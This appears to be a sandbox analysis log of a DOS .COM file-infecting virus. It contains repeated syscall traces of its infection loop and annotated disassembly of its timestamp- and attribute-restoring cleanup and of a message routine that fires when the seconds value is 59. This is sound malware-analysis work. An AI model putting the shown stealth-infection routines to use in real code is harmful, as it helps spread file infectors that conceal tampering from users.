2018-12-25T12:40:44.833270917Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.834852164Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.838201485Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.841608902Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.843354308Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.852058649Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.863962196Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.867354595Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.879777661Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.888345415Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.895256148Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.898189416Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.901286204Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.902957433Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.905939715Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.90973872Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.911761653Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.919818075Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.931642567Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.93456788Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.945414176Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.953994581Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.961103938Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.96265451Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.966593185Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.968801122Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.97182855Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.982100185Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.983819691Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.992330868Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.004040891Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.007474263Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.01887794Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.026739822Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.031530456Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.032810465Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.035531736Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.037497339Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.039893123Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.042835336Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.044925241Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.052304313Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.063080909Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.065746658Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.072440013Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.08031936Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.085709057Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.086908879Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.088870844Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.090382523Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.09558857Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.103725909Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.105381451Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.113949115Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.124624071Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.127130069Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.13231581Z 59 PC: 12b26 | Change current directory
; Time-triggered display routine, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; The text output runs only when the seconds value is 59, so a single sandbox run will usually take the skip
; branch; the listing is cut off after `inc bl`, before any loop-back instruction.
2018-12-25T12:40:45.133936316Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b            ; seconds != 59 (0x3b): skip the display code
0x12b41: mov bh, 0              ; video page 0
0x12b43: mov cx, 0xf00          ; saved on the stack below; NOTE(review): looks like an outer repeat count - confirm past the listing
0x12b46: mov dh, 0xc            ; row 12
0x12b48: mov dl, 5              ; column 5
0x12b4a: mov bl, 1              ; starting text attribute
0x12b4c: push cx                ; preserve CX across the delay loop and the BIOS call
0x12b4d: mov cx, 0x100          ; 256 iterations of a push/pop busy-wait
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp                ; BP is restored after the call
0x12b55: add bp, 0x25f          ; BP -> string at offset 0x25f of the virus data (ES not set in this listing)
0x12b59: mov cx, 0x2d           ; string length: 45 characters
0x12b5c: mov ah, 0x13           ; INT 10h AH=13h: write string (AL write mode is not set in this listing)
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl                 ; next attribute value for the following pass

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14467,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:44.730697502Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:44.734464625Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:44.735749095Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:44.741987724Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:44.767865541Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:44.775005963Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:44.781387524Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:44.782833548Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:44.785561768Z 66 PC: 12b37 | Move file pointer (See above)
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-25T12:40:44.786930231Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-25T12:40:44.789696495Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:44.799401124Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:44.801287498Z 62 PC: 12b09 | Close file
2018-12-25T12:40:44.817894265Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:44.853674164Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.856654067Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.866444391Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.87391708Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.880589582Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.881761072Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.885901781Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.887427708Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.889631077Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.893036919Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.895539686Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.906694727Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.920066068Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.92265576Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.932100102Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.942452578Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.949110879Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.950801831Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.953915339Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.95567785Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.957996825Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.966722115Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.968682742Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.976595622Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.9866266Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.990343539Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.000939181Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.007391887Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.015127303Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.016561049Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.019269417Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.021708055Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.024110702Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.026989076Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.030107681Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.037697287Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.047388883Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.051050507Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.061177972Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.067909044Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.074989915Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.077366856Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.080247288Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.0824727Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.085874675Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.088881411Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.090572879Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.098722123Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.113449025Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.116293331Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.126835826Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.133378482Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.139616281Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.142010259Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.144695123Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.146310326Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.149888822Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.15831297Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.16011293Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.168935189Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.179156244Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.181910959Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.19220466Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.198872676Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.205214821Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.207430523Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.210499085Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.212025651Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.215230312Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.218496517Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.220150506Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.227592125Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.238240057Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.240757674Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.251428729Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.258613663Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.265135379Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.266942786Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.27058056Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.272200885Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.274788729Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.282943512Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.284673615Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.292203016Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.303211074Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.30578393Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.310062976Z 59 PC: 12b26 | Change current directory
; Time-triggered display routine, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; The text output runs only when the seconds value is 59, so a single sandbox run will usually take the skip
; branch; the listing is cut off after `inc bl`, before any loop-back instruction.
2018-12-25T12:40:45.312819637Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b            ; seconds != 59 (0x3b): skip the display code
0x12b41: mov bh, 0              ; video page 0
0x12b43: mov cx, 0xf00          ; saved on the stack below; NOTE(review): looks like an outer repeat count - confirm past the listing
0x12b46: mov dh, 0xc            ; row 12
0x12b48: mov dl, 5              ; column 5
0x12b4a: mov bl, 1              ; starting text attribute
0x12b4c: push cx                ; preserve CX across the delay loop and the BIOS call
0x12b4d: mov cx, 0x100          ; 256 iterations of a push/pop busy-wait
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp                ; BP is restored after the call
0x12b55: add bp, 0x25f          ; BP -> string at offset 0x25f of the virus data (ES not set in this listing)
0x12b59: mov cx, 0x2d           ; string length: 45 characters
0x12b5c: mov ah, 0x13           ; INT 10h AH=13h: write string (AL write mode is not set in this listing)
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl                 ; next attribute value for the following pass

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14467,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.087896797Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.090935639Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.091977593Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.098690239Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.114528504Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.121297448Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.127838037Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.130490954Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:45.134081049Z 66 PC: 12b37 | Move file pointer (See above)
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-25T12:40:45.135813182Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-25T12:40:45.139019187Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.144742954Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.145942192Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.153279068Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.163887592Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.165818962Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.176423495Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.183784946Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.188831196Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.190361284Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.192381106Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.19371552Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.197161872Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.200058442Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.201171802Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.214573001Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.225444673Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.228455704Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.239115918Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.245705562Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.252449853Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.263763028Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.26663178Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.268419022Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.278030465Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.297867091Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.299385342Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.316859721Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.327230413Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.332980553Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.355851477Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.372205993Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.38377836Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.385949793Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.389475875Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.390829926Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.399357833Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.407520466Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.409323272Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.416925471Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.430775692Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.433444975Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.44363785Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.451011985Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.457487672Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.458889379Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.462283133Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.463799797Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.466345167Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.470112172Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.472267353Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.485048687Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.518661647Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.521306544Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.535667126Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.559480363Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.56612308Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.56751625Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.57094969Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.574769492Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.577507592Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.595867608Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.597615889Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.604929923Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.616840919Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.619695001Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.629435019Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.636358277Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.643524029Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.644851589Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.647613274Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.649813827Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.652470552Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.656118755Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.658450182Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.666441138Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.676457664Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.679843471Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.689422047Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.696219047Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.699539002Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.700990484Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.703935671Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.706395682Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.709394122Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.712786674Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.715082301Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.722533709Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.729789942Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.733462542Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.742685106Z 59 PC: 12b26 | Change current directory
; Excerpt 0x12b3c-0x12b62: screen output that runs only when the clock's seconds field is 59.
; Only a BIOS video call (int 10h) is visible in this window; the excerpt ends inside the display code.
; The page's run records carry "Second":0 or "Second":59; 59 is the value tested here.
2018-12-25T12:40:45.74437939Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b ; DH = seconds returned by Get time; compare with 59
0x12b3f: jne 0x12b6b ; any other second: skip to 0x12b6b (not shown)
0x12b41: mov bh, 0 ; int 10h AH=13h argument: video page 0
0x12b43: mov cx, 0xf00 ; pushed below and popped after the call; looks like an outer loop counter - loop end not shown
0x12b46: mov dh, 0xc ; row 12
0x12b48: mov dl, 5 ; column 5
0x12b4a: mov bl, 1 ; character attribute (colour) 1
0x12b4c: push cx ; keep CX while it is reused for the delay and the string length
0x12b4d: mov cx, 0x100 ; 256 iterations
0x12b50: push ax ; push/pop pair leaves AX unchanged: a short busy-wait
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp ; BP is restored after the call
0x12b55: add bp, 0x25f ; BP -> string 0x25f past the base held in BP (ES is not set in this excerpt)
0x12b59: mov cx, 0x2d ; string length = 45 characters
0x12b5c: mov ah, 0x13 ; int 10h AH=13h: write string; AL (write mode) is not set in this excerpt
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl ; next attribute value - presumably colour cycling on the following pass; excerpt ends here

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":59,"TimeBased":true,"OriginalID":14467,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.235937474Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.23958735Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.246056946Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.253285635Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.27369484Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.287027502Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.294082255Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.295284301Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
